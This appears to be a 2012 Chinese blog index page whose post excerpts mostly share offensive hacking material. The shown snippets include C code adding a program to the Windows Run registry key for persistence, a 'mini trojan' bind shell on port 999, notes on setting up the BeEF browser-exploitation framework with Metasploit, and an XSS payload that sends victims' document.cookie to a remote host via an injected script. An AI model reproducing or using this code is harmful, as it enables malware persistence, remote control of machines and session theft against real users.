摘要: 下面这段代码是vc++对注册表的一系列操作,还有文件自身的复制功能#include <stdio.h>#include <windows.h>int main(void){ char regname[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HKEY hkResult; int ret; //打开关键字 ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); ret=RegSetValueEx(hkResult," 阅读全文
posted @ 2012-11-19 22:20 山貓 阅读(368) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/raoxj/item/a50fe81af2ba11f965eabf5c才在网上下了一个Microsoft Visual C++6.0,安装以后,当点击打开按钮时出现错误提示: 点击确定后又出现: 然后就自动退出了。解决方法如下:在官网上下载Vs6sp6.exe,然后安装即可。http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=zh-cn 下载完成后,只需将其先解压到随便一个文件夹中, 阅读全文
posted @ 2012-11-19 22:11 山貓 阅读(584) 评论(0) 推荐(0) 编辑
摘要: 这是个mini木马,要正向连接,通过telnet或nc连接就好。#pragma comment(lib,"ws2_32.lib")#include <winsock2.h>#include <windows.h>#define MasterPort 999 //定义监听端口999main(){ WSADATA WSADa; sockaddr_in SockAddrIn; SOCKET CSocket,SSocket; int iAddrSize; PROCESS_INFORMATION ProcessInfo; STARTUPINFO Startup 阅读全文
posted @ 2012-11-19 20:56 山貓 阅读(943) 评论(1) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/unixshell/item/2b57af1112ec9df9746a8430配置beef和metasploit(包含安装Beef过程)系统环境:BackTrack5R1软件版本:Beef0.4.3.6-alphametasploitv4.4.0-devsvnr15552一、前言之前对于BeEF毫无了解,好奇心驱使下便按部就班研究一下,虽然中途问题多多,但是最后还算成功,收获不少二、安装BeEF按照文章上所指,先删除BT5上面自带的版本稍旧的BeEFrm-rf/pentest/web/beef-ng然后通过Gitclone最新的BeEF代码gitc 阅读全文
posted @ 2012-11-19 11:03 山貓 阅读(1872) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/unixshell/item/396c3e9968dbf4cfb625310cBeEF是目前欧美最流行的web框架攻击平台,它的全称 是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍,很多 pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过 浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。如何配置beef和metasploitwindo 阅读全文
posted @ 2012-11-19 10:32 山貓 阅读(785) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.2cto.com/Article/201207/140515.html作者 Joe Lynch[Dis9]1、引言Beef 一个很强大的xss 攻击框架新版的beef 还不是很熟悉2、测试开始msf > beef_connect http://192.168.2.106:3000 beef beef[*] Connected to http://192.168.2.106:3000msf > beef_onlineCurrently hooked browsers within BeEFId IP OS-- -- --0 1.1.1.2 Microsof 阅读全文
posted @ 2012-11-19 08:55 山貓 阅读(1745) 评论(0) 推荐(0) 编辑
摘要: 在evil.js文件中写如下代码,存储在www.test.com根目录下var img=document.createElement("img");img.src="http://www.test.com/log?"+escape(document.cookie);document.body.appendChild(img);然后在测试页,想办法让别人运行这段代码<script src="http://www.test.com/evil.js"></script>然后在web日志中可查看窃取的cookie信息如 阅读全文
posted @ 2012-11-19 01:43 山貓 阅读(505) 评论(0) 推荐(0) 编辑